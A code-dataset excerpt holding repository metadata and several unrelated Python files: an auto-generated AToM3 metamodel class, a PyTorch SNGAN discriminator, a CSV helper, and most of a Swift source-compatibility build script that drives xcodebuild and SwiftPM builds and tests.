] | 3
|
2017-06-02T19:26:27.000Z
|
2021-06-14T04:25:45.000Z
|
UMLRT2Kiltera_MM/MT_pre__TransitionType.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 8
|
2016-08-24T07:04:07.000Z
|
2017-05-26T16:22:47.000Z
|
UMLRT2Kiltera_MM/MT_pre__TransitionType.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 1
|
2019-10-31T06:00:23.000Z
|
2019-10-31T06:00:23.000Z
|
"""
__MT_pre__TransitionType.py_____________________________________________________
Automatically generated AToM3 syntactic object (DO NOT MODIFY DIRECTLY)
Author: gehan
Modified: Sun Feb 15 10:22:14 2015
________________________________________________________________________________
"""
from ASGNode import *
from ATOM3Type import *
from ATOM3Text import *
from ATOM3String import *
from ATOM3Boolean import *
from graph_MT_pre__TransitionType import *
class MT_pre__TransitionType(ASGNode, ATOM3Type):
def __init__(self, parent = None):
ASGNode.__init__(self)
ATOM3Type.__init__(self)
self.superTypes = ['MT_pre__MetaModelElement_S']
self.graphClass_ = graph_MT_pre__TransitionType
self.isGraphObjectVisual = True
if(hasattr(self, '_setHierarchicalLink')):
self._setHierarchicalLink(False)
if(hasattr(self, '_setHierarchicalNode')):
self._setHierarchicalNode(False)
self.parent = parent
self.MT_pre__cardinality=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_pre__classtype=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_pre__name=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
self.MT_label__=ATOM3String('', 20)
self.MT_pivotOut__=ATOM3String('', 20)
self.MT_pivotIn__=ATOM3String('', 20)
self.MT_subtypeMatching__=ATOM3Boolean()
self.MT_subtypeMatching__.setValue(('True', 0))
self.MT_subtypeMatching__.config = 0
self.generatedAttributes = {'MT_pre__cardinality': ('ATOM3Text', ),
'MT_pre__classtype': ('ATOM3Text', ),
'MT_pre__name': ('ATOM3Text', ),
'MT_label__': ('ATOM3String', ),
'MT_pivotOut__': ('ATOM3String', ),
'MT_pivotIn__': ('ATOM3String', ),
'MT_subtypeMatching__': ('ATOM3Boolean', ) }
self.realOrder = ['MT_pre__cardinality','MT_pre__classtype','MT_pre__name','MT_label__','MT_pivotOut__','MT_pivotIn__','MT_subtypeMatching__']
self.directEditing = [0,0,0,1,1,1,1]
def clone(self):
cloneObject = MT_pre__TransitionType( self.parent )
for atr in self.realOrder:
cloneObject.setAttrValue(atr, self.getAttrValue(atr).clone() )
ASGNode.cloneActions(self, cloneObject)
return cloneObject
def copy(self, other):
ATOM3Type.copy(self, other)
for atr in self.realOrder:
self.setAttrValue(atr, other.getAttrValue(atr) )
ASGNode.copy(self, other)
def preCondition (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.preCondition(actionID, params)
else: return None
def postCondition (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.postCondition(actionID, params)
else: return None
def preAction (self, actionID, * params):
if actionID == self.CREATE:
self.autoIncrLabel(params)
if self.graphObject_:
return self.graphObject_.preAction(actionID, params)
else: return None
def postAction (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.postAction(actionID, params)
else: return None
def QOCA(self, params):
"""
QOCA Constraint Template
NOTE: DO NOT select a POST/PRE action trigger
Constraints will be added/removed in a logical manner by other mechanisms.
"""
return # <---- Remove this to use QOCA
""" Get the high level constraint helper and solver """
from Qoca.atom3constraints.OffsetConstraints import OffsetConstraints
oc = OffsetConstraints(self.parent.qocaSolver)
"""
Example constraint, see Kernel/QOCA/atom3constraints/OffsetConstraints.py
For more types of constraints
"""
oc.fixedWidth(self.graphObject_, self.graphObject_.sizeX)
oc.fixedHeight(self.graphObject_, self.graphObject_.sizeY)
def autoIncrLabel(self, params):
#===============================================================================
# Auto increment the label
#===============================================================================
# If there is already one, ignore
if not self.MT_label__.isNone(): return
# Get the maximum label of all MT_pre__ elements
label = 0
for nt in self.parent.ASGroot.listNodes:
if nt.startswith('MT_pre__'):
for node in self.parent.ASGroot.listNodes[nt]:
currLabel = 0
try:
currLabel = int(node.MT_label__.getValue())
except:
pass
if currLabel > label:
label = currLabel
# The label of this instance will be the max label + 1
self.MT_label__.setValue(str(label + 1))
| 52.456693
| 630
| 0.602222
|
68fa096354b62e9c1be14b86dccb08c25edfb8ab
| 4,562
|
py
|
Python
|
models/discriminators.py
|
rystylee/pytorch-SNGAN-projection
|
825f70180d8c3606dec75098d09216b41ea98fe4
|
[
"MIT"
] | null | null | null |
models/discriminators.py
|
rystylee/pytorch-SNGAN-projection
|
825f70180d8c3606dec75098d09216b41ea98fe4
|
[
"MIT"
] | 6
|
2019-11-19T10:12:34.000Z
|
2022-03-12T00:05:37.000Z
|
models/discriminators.py
|
rystylee/pytorch-SNGAN-projection
|
825f70180d8c3606dec75098d09216b41ea98fe4
|
[
"MIT"
] | 1
|
2019-11-19T10:14:33.000Z
|
2019-11-19T10:14:33.000Z
|
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
def downsample(x):
return F.avg_pool2d(x, 2)
class ResBlock(nn.Module):
def __init__(self, in_ch, out_ch, hidden_ch=None, ksize=3, pad=1,
activation=F.relu, downsampling=False):
super(ResBlock, self).__init__()
self.activation = activation
self.downsampling = downsampling
self.learnable_sc = (in_ch != out_ch) or downsampling
hidden_ch = in_ch if hidden_ch is None else hidden_ch
self.conv1 = nn.utils.spectral_norm(nn.Conv2d(in_ch, hidden_ch, kernel_size=ksize, stride=1, padding=pad))
self.conv2 = nn.utils.spectral_norm(nn.Conv2d(hidden_ch, out_ch, kernel_size=ksize, stride=1, padding=pad))
if self.learnable_sc:
self.c_sc = nn.utils.spectral_norm(nn.Conv2d(in_ch, out_ch, kernel_size=1, stride=1, padding=0))
self._initialize()
def _initialize(self):
nn.init.xavier_uniform_(self.conv1.weight.data, gain=math.sqrt(2))
nn.init.xavier_uniform_(self.conv2.weight.data, gain=math.sqrt(2))
if self.learnable_sc:
nn.init.xavier_uniform_(self.c_sc.weight.data, gain=1.)
def forward(self, x):
return self.residual(x) + self.shortcut(x)
def residual(self, x):
h = x
h = self.activation(h)
h = self.conv1(h)
h = self.activation(h)
h = self.conv2(h)
if self.downsampling:
h = downsample(h)
return h
def shortcut(self, x):
if self.learnable_sc:
x = self.c_sc(x)
if self.downsampling:
x = downsample(x)
return x
else:
return x
class OptimizeBlock(nn.Module):
def __init__(self, in_ch, out_ch, ksize=3, pad=1, activation=F.relu):
super(OptimizeBlock, self).__init__()
self.activation = activation
self.conv1 = nn.utils.spectral_norm(nn.Conv2d(in_ch, out_ch, kernel_size=ksize, stride=1, padding=pad))
self.conv2 = nn.utils.spectral_norm(nn.Conv2d(out_ch, out_ch, kernel_size=ksize, stride=1, padding=pad))
self.c_sc = nn.utils.spectral_norm(nn.Conv2d(in_ch, out_ch, kernel_size=1, stride=1, padding=0))
self._initialize()
def _initialize(self):
nn.init.xavier_uniform_(self.conv1.weight.data, gain=math.sqrt(2))
nn.init.xavier_uniform_(self.conv2.weight.data, gain=math.sqrt(2))
nn.init.xavier_uniform_(self.c_sc.weight.data, gain=1.)
def forward(self, x):
return self.residual(x) + self.shortcut(x)
def residual(self, x):
h = x
h = self.conv1(h)
h = self.activation(h)
h = self.conv2(h)
h = downsample(h)
return h
def shortcut(self, x):
h = x
h = downsample(h)
h = self.c_sc(h)
return h
class SNResNetProjectionDiscriminator(nn.Module):
def __init__(self, ch=64, dim_c=3, n_classes=0, activation=F.relu):
super(SNResNetProjectionDiscriminator, self).__init__()
self.activation = activation
self.n_classes = n_classes
self.block1 = OptimizeBlock(dim_c, ch)
self.block2 = ResBlock(ch * 1, ch * 2, activation=activation, downsampling=True)
self.block3 = ResBlock(ch * 2, ch * 4, activation=activation, downsampling=True)
self.block4 = ResBlock(ch * 4, ch * 8, activation=activation, downsampling=True)
self.block5 = ResBlock(ch * 8, ch * 8, activation=activation, downsampling=True)
self.block6 = ResBlock(ch * 8, ch * 16, activation=activation, downsampling=True)
self.block7 = ResBlock(ch * 16, ch * 16, activation=activation, downsampling=False)
self.l8 = nn.utils.spectral_norm(nn.Linear(ch * 16, 1))
if n_classes > 0:
self.l_y = nn.utils.spectral_norm(nn.Embedding(n_classes, ch * 16))
self._initialize()
def _initialize(self):
nn.init.xavier_uniform_(self.l8.weight.data)
if self.n_classes:
nn.init.xavier_uniform_(self.l_y.weight.data)
def forward(self, x, y=None):
h = x
h = self.block1(h)
h = self.block2(h)
h = self.block3(h)
h = self.block4(h)
h = self.block5(h)
h = self.block6(h)
h = self.block7(h)
h = self.activation(h)
h = torch.sum(h, dim=(2, 3))
out = self.l8(h)
if y is not None:
w_y = self.l_y(y)
out += torch.sum(w_y * h, dim=1, keepdim=True)
return out
| 34.044776
| 115
| 0.6153
|
7ee0bf8792757869d7ce5035bf3c2d01b9544660
| 892
|
py
|
Python
|
qualifier/utils/fileio.py
|
aparkon/week_2_challange
|
2f2cacf06110aad1f0f0c0b83cdc1790cf162614
|
[
"Unlicense"
] | null | null | null |
qualifier/utils/fileio.py
|
aparkon/week_2_challange
|
2f2cacf06110aad1f0f0c0b83cdc1790cf162614
|
[
"Unlicense"
] | null | null | null |
qualifier/utils/fileio.py
|
aparkon/week_2_challange
|
2f2cacf06110aad1f0f0c0b83cdc1790cf162614
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Helper functions to load and save CSV data.
This contains a helper function for loading and saving CSV files.
"""
import csv
def load_csv(csvpath):
"""Reads the CSV file from path provided.
Args:
csvpath (Path): The csv file path.
Returns:
A list of lists that contains the rows of data from the CSV file.
"""
with open(csvpath, "r") as csvfile:
data = []
csvreader = csv.reader(csvfile, delimiter=",")
# Skip the CSV Header
next(csvreader)
# Read the CSV data
for row in csvreader:
data.append(row)
return data
def save_csv(csvpath, data, header=None):
with open(csvpath, "w",newline="") as csvfile:
csvwriter = csv.writer(csvfile,delimiter=",")
if header:
csvwriter.writerow(header)
csvwriter.writerow(data)
| 22.871795
| 73
| 0.605381
|
b4e3768586ab3e76e46cc05549b71eaf87d60c64
| 55,549
|
py
|
Python
|
project_future.py
|
owenv/swift-source-compat-suite
|
b8dd2ff71bdc0b9a70dc0db9cd1b8fbf16ba9e1f
|
[
"Apache-2.0"
] | null | null | null |
project_future.py
|
owenv/swift-source-compat-suite
|
b8dd2ff71bdc0b9a70dc0db9cd1b8fbf16ba9e1f
|
[
"Apache-2.0"
] | null | null | null |
project_future.py
|
owenv/swift-source-compat-suite
|
b8dd2ff71bdc0b9a70dc0db9cd1b8fbf16ba9e1f
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# ===--- project.py -------------------------------------------------------===
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ===----------------------------------------------------------------------===
"""A library containing common project building functionality."""
import os
import platform
import re
import subprocess
import shutil
import filecmp
import sys
import json
import time
import argparse
import shlex
import common
try:
basestring # Python 2
except NameError:
basestring = str # Python 3
swift_branch = None
def set_swift_branch(branch):
"""Configure the library for a specific branch.
>>> set_swift_branch('master')
"""
global swift_branch
swift_branch = branch
common.set_swift_branch(branch)
class ProjectTarget(object):
"""An abstract project target."""
def get_build_command(self, incremental=False):
"""Return a command that builds the project target."""
raise NotImplementedError
def get_test_command(self, incremental=False):
"""Return a command that tests the project target."""
raise NotImplementedError
def build(self, sandbox_profile, stdout=sys.stdout, stderr=sys.stderr,
incremental=False):
"""Build the project target."""
return common.check_execute(self.get_build_command(incremental=incremental),
sandbox_profile=sandbox_profile,
stdout=stdout, stderr=stdout)
def test(self, sandbox_profile, stdout=sys.stdout, stderr=sys.stderr,
incremental=False):
"""Test the project target."""
return common.check_execute(self.get_test_command(incremental=incremental),
sandbox_profile=sandbox_profile,
stdout=stdout, stderr=stdout)
class XcodeTarget(ProjectTarget):
"""An Xcode workspace scheme."""
def __init__(self, swiftc, project, target, destination, env,
added_xcodebuild_flags, is_workspace, has_scheme,
clean_build):
self._swiftc = swiftc
self._project = project
self._target = target
self._destination = destination
self._env = env
self._added_xcodebuild_flags = added_xcodebuild_flags
self._is_workspace = is_workspace
self._has_scheme = has_scheme
self._clean_build = clean_build
@property
def project_param(self):
if self._is_workspace:
return '-workspace'
return '-project'
@property
def target_param(self):
if self._has_scheme:
return '-scheme'
return '-target'
def get_build_command(self, incremental=False):
project_param = self.project_param
target_param = self.target_param
try:
build_parent_dir = common.check_execute_output([
'git', '-C', os.path.dirname(self._project),
'rev-parse', '--show-toplevel']).rstrip()
except common.ExecuteCommandFailure as error:
build_parent_dir = os.path.dirname(self._project)
build_dir = os.path.join(build_parent_dir, 'build')
build = []
if self._clean_build and not incremental:
build += ['clean']
build += ['build']
dir_override = []
if self._has_scheme:
dir_override += ['-derivedDataPath', build_dir]
elif not 'SYMROOT' in self._env:
dir_override += ['SYMROOT=' + build_dir]
dir_override += [k + "=" + v for k, v in self._env.items()]
command = (['xcodebuild']
+ build
+ [project_param, self._project,
target_param, self._target,
'-destination', self._destination]
+ dir_override
+ ['CODE_SIGN_IDENTITY=',
'CODE_SIGNING_REQUIRED=NO',
'ENTITLEMENTS_REQUIRED=NO',
'ENABLE_BITCODE=NO',
'INDEX_ENABLE_DATA_STORE=NO',
'GCC_TREAT_WARNINGS_AS_ERRORS=NO',
'SWIFT_TREAT_WARNINGS_AS_ERRORS=NO'])
command += self._added_xcodebuild_flags
if self._destination == 'generic/platform=watchOS':
command += ['ARCHS=armv7k']
return command
def get_test_command(self, incremental=False):
project_param = self.project_param
target_param = self.target_param
test = ['clean', 'test']
if incremental:
test = ['test']
command = (['xcodebuild']
+ test
+ [project_param, self._project,
target_param, self._target,
'-destination', self._destination,
# TODO: stdlib search code
'SWIFT_LIBRARY_PATH=%s' %
get_stdlib_platform_path(
self._swiftc,
self._destination)]
+ ['INDEX_ENABLE_DATA_STORE=NO',
'GCC_TREAT_WARNINGS_AS_ERRORS=NO'])
command += self._added_xcodebuild_flags
return command
def get_stdlib_platform_path(swiftc, destination):
"""Return the corresponding stdlib name for a destination."""
platform_stdlib_path = {
'macOS': 'macosx',
'iOS': 'iphonesimulator',
'tvOS': 'appletvsimulator',
'watchOS': 'watchsimulator',
}
stdlib_dir = None
for platform_key in platform_stdlib_path:
if platform_key in destination:
stdlib_dir = platform_stdlib_path[platform_key]
break
assert stdlib_dir is not None
stdlib_path = os.path.join(os.path.dirname(os.path.dirname(swiftc)),
'lib/swift/' + stdlib_dir)
return stdlib_path
def clean_swift_package(path, swiftc, sandbox_profile,
stdout=sys.stdout, stderr=sys.stderr):
"""Clean a Swift package manager project."""
swift = os.path.join(os.path.dirname(swiftc), 'swift')
if swift_branch == 'swift-3.0-branch':
command = [swift, 'build', '-C', path, '--clean']
else:
command = [swift, 'package', '-C', path, 'clean']
if (swift_branch not in ['swift-3.0-branch',
'swift-3.1-branch']):
command.insert(2, '--disable-sandbox')
return common.check_execute(command, sandbox_profile=sandbox_profile,
stdout=stdout, stderr=stderr)
def build_swift_package(path, swiftc, configuration, sandbox_profile,
stdout=sys.stdout, stderr=sys.stderr,
added_swift_flags=None,
incremental=False):
"""Build a Swift package manager project."""
swift = os.path.join(os.path.dirname(swiftc), 'swift')
if not incremental:
clean_swift_package(path, swiftc, sandbox_profile,
stdout=stdout, stderr=stderr)
env = os.environ
env['DYLD_LIBRARY_PATH'] = get_stdlib_platform_path(swiftc, 'macOS')
env['SWIFT_EXEC'] = swiftc
command = [swift, 'build', '-C', path, '--verbose',
'--configuration', configuration]
if (swift_branch not in ['swift-3.0-branch',
'swift-3.1-branch']):
command.insert(2, '--disable-sandbox')
if added_swift_flags is not None:
for flag in added_swift_flags.split():
command += ["-Xswiftc", flag]
return common.check_execute(command, timeout=3600,
sandbox_profile=sandbox_profile,
stdout=stdout, stderr=stderr,
env=env)
def test_swift_package(path, swiftc, sandbox_profile,
stdout=sys.stdout, stderr=sys.stderr,
added_swift_flags=None,
incremental=False):
"""Test a Swift package manager project."""
swift = os.path.join(os.path.dirname(swiftc), 'swift')
if not incremental:
clean_swift_package(path, swiftc, sandbox_profile)
env = os.environ
env['SWIFT_EXEC'] = swiftc
command = [swift, 'test', '-C', path, '--verbose']
if added_swift_flags is not None:
for flag in added_swift_flags.split():
command += ["-Xswiftc", flag]
if (swift_branch not in ['swift-3.0-branch',
'swift-3.1-branch']):
command.insert(2, '--disable-sandbox')
return common.check_execute(command, timeout=3600,
sandbox_profile=sandbox_profile,
stdout=stdout, stderr=stderr,
env=env)
def checkout(root_path, repo, commit):
"""Checkout an indexed repository."""
path = os.path.join(root_path, repo['path'])
if repo['repository'] == 'Git':
if os.path.exists(path):
return common.git_update(repo['url'], commit, path)
else:
return common.git_clone(repo['url'], path, tree=commit)
raise common.Unreachable('Unsupported repository: %s' %
repo['repository'])
def strip_resource_phases(repo_path, stdout=sys.stdout, stderr=sys.stderr):
"""Strip resource build phases from a given project."""
command = ['perl', '-i', '-00ne',
'print unless /Begin PBXResourcesBuildPhase/']
for root, dirs, files in os.walk(repo_path):
for filename in files:
if filename == 'project.pbxproj':
pbxfile = os.path.join(root, filename)
common.check_execute(command + [pbxfile],
stdout=stdout, stderr=stderr)
def dispatch(root_path, repo, action, swiftc, swift_version,
sandbox_profile_xcodebuild, sandbox_profile_package,
added_swift_flags, added_xcodebuild_flags,
build_config, should_strip_resource_phases=False,
stdout=sys.stdout, stderr=sys.stderr,
incremental=False):
"""Call functions corresponding to actions."""
substitutions = action.copy()
substitutions.update(repo)
if added_swift_flags:
# Support added swift flags specific to the current repository and
# action by passing their fields as keyword arguments to format, e.g.
# so that {path} in '-index-store-path /tmp/index/{path}' is replaced
# with the value of repo's path field.
added_swift_flags = added_swift_flags.format(**substitutions)
if added_xcodebuild_flags:
added_xcodebuild_flags = \
shlex.split(added_xcodebuild_flags.format(**substitutions))
else:
added_xcodebuild_flags = []
if action['action'] == 'BuildSwiftPackage':
if not build_config:
build_config = action['configuration']
return build_swift_package(os.path.join(root_path, repo['path']),
swiftc,
build_config,
sandbox_profile_package,
stdout=stdout, stderr=stderr,
added_swift_flags=added_swift_flags,
incremental=incremental)
elif action['action'] == 'TestSwiftPackage':
return test_swift_package(os.path.join(root_path, repo['path']),
swiftc,
sandbox_profile_package,
stdout=stdout, stderr=stderr,
added_swift_flags=added_swift_flags,
incremental=incremental)
elif re.match(r'^(Build|Test)Xcode(Workspace|Project)(Scheme|Target)$',
action['action']):
match = re.match(
r'^(Build|Test)Xcode(Workspace|Project)(Scheme|Target)$',
action['action']
)
initial_xcodebuild_flags = ['SWIFT_EXEC=%s' % swiftc,
'-IDEPackageSupportDisableManifestSandbox=YES']
if build_config == 'debug':
initial_xcodebuild_flags += ['-configuration', 'Debug']
elif build_config == 'release':
initial_xcodebuild_flags += ['-configuration', 'Release']
elif 'configuration' in action:
initial_xcodebuild_flags += ['-configuration',
action['configuration']]
build_env = {}
if 'environment' in action:
build_env = action['environment']
other_swift_flags = []
if swift_version:
if '.' not in swift_version:
swift_version += '.0'
major, minor = swift_version.split('.', 1)
# Need to use float for minor version parsing
# because it's possible that it would be specified
# as e.g. `4.0.3`
if int(major) == 4 and float(minor) == 2.0:
other_swift_flags += ['-swift-version', swift_version]
initial_xcodebuild_flags += ['SWIFT_VERSION=%s' % swift_version]
else:
other_swift_flags += ['-swift-version', major]
initial_xcodebuild_flags += ['SWIFT_VERSION=%s' % major]
if added_swift_flags:
other_swift_flags.append(added_swift_flags)
if other_swift_flags:
other_swift_flags = ['$(OTHER_SWIFT_FLAGS)'] + other_swift_flags
initial_xcodebuild_flags += ['OTHER_SWIFT_FLAGS=%s' % ' '.join(other_swift_flags)]
is_workspace = match.group(2).lower() == 'workspace'
project_path = os.path.join(root_path, repo['path'],
action[match.group(2).lower()])
has_scheme = match.group(3).lower() == 'scheme'
clean_build = True
if 'clean_build' in action:
clean_build = action['clean_build']
xcode_target = \
XcodeTarget(swiftc,
project_path,
action[match.group(3).lower()],
action['destination'],
build_env,
initial_xcodebuild_flags + added_xcodebuild_flags,
is_workspace,
has_scheme,
clean_build)
if should_strip_resource_phases:
strip_resource_phases(os.path.join(root_path, repo['path']),
stdout=stdout, stderr=stderr)
if match.group(1) == 'Build':
return xcode_target.build(sandbox_profile_xcodebuild,
stdout=stdout, stderr=stderr,
incremental=incremental)
else:
return xcode_target.test(sandbox_profile_xcodebuild,
stdout=stdout, stderr=stderr,
incremental=incremental)
else:
raise common.Unimplemented("Unknown action: %s" % action['action'])
def is_xfailed(xfail_args, compatible_version, platform, swift_branch, build_config):
"""Return whether the specified swift version/platform/branch/configuration is xfailed."""
if isinstance(xfail_args, dict):
xfail_args = [xfail_args]
def is_or_contains(spec, arg):
return arg in spec if isinstance(spec, list) else spec == arg
def matches(spec):
issue = spec['issue'].split()[0]
current = {
'compatibility': compatible_version,
'branch': swift_branch,
'platform': platform
}
if 'configuration' in spec:
if build_config is None:
raise common.Unreachable("'xfail' entry contains 'configuration' "
"but none supplied via '--build-config' or the containing "
"action's 'configuration' field.")
current['configuration'] = build_config.lower()
for key, value in current.iteritems():
if key in spec and not is_or_contains(spec[key], value):
return None
return issue
for spec in xfail_args:
issue = matches(spec)
if issue is not None:
return issue
return None
def str2bool(s):
"""Convert an argument string into a boolean."""
if s.lower() == 'true':
return True
elif s.lower() == 'false':
return False
else:
raise argparse.ArgumentTypeError('true/false boolean value expected.')
def add_arguments(parser):
"""Add common arguments to parser."""
parser.register('type', 'bool', str2bool)
parser.add_argument('--verbose',
action='store_true')
# TODO: remove Linux sandbox hack
if platform.system() == 'Darwin':
parser.add_argument('--swiftc',
metavar='PATH',
help='swiftc executable',
required=True,
type=os.path.abspath)
else:
parser.add_argument('--swiftc',
metavar='PATH',
help='swiftc executable',
required=True)
parser.add_argument('--projects',
metavar='PATH',
required=True,
help='JSON project file',
type=os.path.abspath)
parser.add_argument('--swift-version',
metavar='VERS',
help='Swift version mode (default: None)')
parser.add_argument('--include-repos',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to include a repo '
'(example: \'path == "Alamofire"\')')
parser.add_argument('--exclude-repos',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to exclude a repo '
'(example: \'path == "Alamofire"\')')
parser.add_argument('--include-versions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to include a Swift version '
'(example: '
'\'version == "3.0"\')')
parser.add_argument('--exclude-versions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to exclude a Swift version '
'(example: '
'\'version == "3.0"\')')
parser.add_argument('--include-actions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to include an action '
'(example: '
'\'action == "BuildXcodeWorkspaceScheme"\')')
parser.add_argument('--exclude-actions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to exclude an action '
'(example: '
'\'action == "BuildXcodeWorkspaceScheme"\')')
parser.add_argument('--swift-branch',
metavar='BRANCH',
help='Swift branch configuration to use',
default='master')
parser.add_argument('--sandbox-profile-xcodebuild',
metavar='FILE',
help='sandbox xcodebuild build and test operations '
'with profile',
type=os.path.abspath)
parser.add_argument('--sandbox-profile-package',
metavar='FILE',
help='sandbox package build and test operations with '
'profile',
type=os.path.abspath)
parser.add_argument("--test-incremental",
help='test incremental-mode over multiple commits',
action='store_true')
parser.add_argument("--add-swift-flags",
metavar="FLAGS",
help='add flags to each Swift invocation (note: field '
'names from projects.json enclosed in {} will be '
'replaced with their value)',
default='')
parser.add_argument("--add-xcodebuild-flags",
metavar="FLAGS",
help='add flags to each xcodebuild invocation (note: field '
'names from projects.json enclosed in {} will be '
'replaced with their value)',
default='')
parser.add_argument("--skip-clean",
help='skip all git and build clean steps before '
'building projects',
action='store_true'),
parser.add_argument("--build-config",
metavar="NAME",
choices=['debug', 'release'],
dest='build_config',
help='specify "debug" or "release" to override '
'the build configuration in the projects.json file')
parser.add_argument("--strip-resource-phases",
help='strip all resource phases from project file '
'before building (default: true)',
metavar='BOOL',
type='bool',
nargs='?',
const=True,
default=True)
parser.add_argument("--project-cache-path",
help='Path of the dir where all the project binaries will be placed',
metavar='PATH',
type=os.path.abspath,
default='project_cache')
def add_minimal_arguments(parser):
"""Add common arguments to parser."""
parser.add_argument('--verbose',
action='store_true')
parser.add_argument('--projects',
metavar='PATH',
required=True,
help='JSON project file',
type=os.path.abspath)
parser.add_argument('--include-repos',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to include a repo '
'(example: \'path == "Alamofire"\')')
parser.add_argument('--exclude-repos',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to exclude a repo '
'(example: \'path == "Alamofire"\')')
parser.add_argument('--include-versions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to include a Swift version '
'(example: '
'\'version == "3.0"\')')
parser.add_argument('--exclude-versions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to exclude a Swift version '
'(example: '
'\'version == "3.0"\')')
parser.add_argument('--include-actions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to include an action '
'(example: '
'\'action == "BuildXcodeWorkspaceScheme"\')')
parser.add_argument('--exclude-actions',
metavar='PREDICATE',
default=[],
action='append',
help='a Python predicate to determine '
'whether to exclude an action '
'(example: '
'\'action == "BuildXcodeWorkspaceScheme"\')')
parser.add_argument('--swift-branch',
metavar='BRANCH',
help='Swift branch configuration to use',
default='master')
def evaluate_predicate(element, predicate):
"""Evaluate predicate in context of index element fields."""
# pylint: disable=I0011,W0122,W0123
for key in element:
if isinstance(element[key], basestring):
exec(key + ' = """' + element[key] + '"""')
return eval(predicate)
def included_element(include_predicates, exclude_predicates, element):
"""Return whether an index element should be included."""
return (not any(evaluate_predicate(element, ep)
for ep in exclude_predicates) and
(include_predicates == [] or
any(evaluate_predicate(element, ip)
for ip in include_predicates)))
class Factory(object):
@classmethod
def factory(cls, *factoryargs):
def init(*initargs):
return cls(*(factoryargs + initargs))
return init
def dict_get(dictionary, *args, **kwargs):
"""Return first value in dictionary by iterating through keys"""
for key in args:
try:
return dictionary[key]
except KeyError:
pass
if 'default' in kwargs:
return kwargs['default']
else:
raise KeyError
def enum(*sequential, **named):
enums = dict(zip(sequential, range(len(sequential))), **named)
reverse = dict((value, key) for key, value in enums.iteritems())
keys = enums.keys()
values = enums.values()
enums['keys'] = keys
enums['values'] = values
enums['reverse_mapping'] = reverse
return type('Enum', (object,), enums)
ResultEnum = enum(
'FAIL',
'XFAIL',
'PASS',
'UPASS'
)
class Result(ResultEnum):
def __init__(self, result, text):
self.result = result
self.text = text
def __str__(self):
return ResultEnum.reverse_mapping[self.result]
class ActionResult(Result):
pass
class ListResult(Result):
def __init__(self):
self.subresults = {value: [] for value in ResultEnum.values}
def add(self, result):
if result:
self.subresults[result.result].append(result)
def xfails(self):
return self.subresults[Result.XFAIL]
def fails(self):
return self.subresults[Result.FAIL]
def upasses(self):
return self.subresults[Result.UPASS]
def passes(self):
return self.subresults[Result.PASS]
def all(self):
return [i for l in self.subresults.values() for i in l]
def recursive_all(self):
stack = self.all()
actions = []
while stack:
result = stack.pop(0)
if isinstance(result, ActionResult):
actions.append(result)
else:
for r in result.all():
stack.insert(0, r)
return actions
@property
def result(self):
if self.subresults[Result.FAIL]:
return Result.FAIL
elif self.subresults[Result.UPASS]:
return Result.UPASS
elif self.subresults[Result.XFAIL]:
return Result.XFAIL
elif self.subresults[Result.PASS]:
return Result.PASS
else:
return Result.PASS
def __add__(self, other):
n = self.__class__()
n.subresults = {
Result.__dict__[x]:
(self.subresults[Result.__dict__[x]] +
other.subresults[Result.__dict__[x]])
for x in Result.__dict__ if not x.startswith('_')}
return n
class ProjectListResult(ListResult):
def __str__(self):
output = ""
xfails = [ar for ar in self.recursive_all()
if ar.result == Result.XFAIL]
fails = [ar for ar in self.recursive_all()
if ar.result == Result.FAIL]
upasses = [ar for ar in self.recursive_all()
if ar.result == Result.UPASS]
passes = [ar for ar in self.recursive_all()
if ar.result == Result.PASS]
if xfails:
output += ('='*40) + '\n'
output += 'XFailures:' '\n'
for xfail in xfails:
output += ' ' + xfail.text + '\n'
if upasses:
output += ('='*40) + '\n'
output += 'UPasses:' + '\n'
for upass in upasses:
output += ' ' + upass.text + '\n'
if fails:
output += ('='*40) + '\n'
output += 'Failures:' + '\n'
for fail in fails:
output += ' ' + fail.text + '\n'
output += ('='*40) + '\n'
output += 'Action Summary:' + '\n'
output += (' Passed: %s' % len(passes)) + '\n'
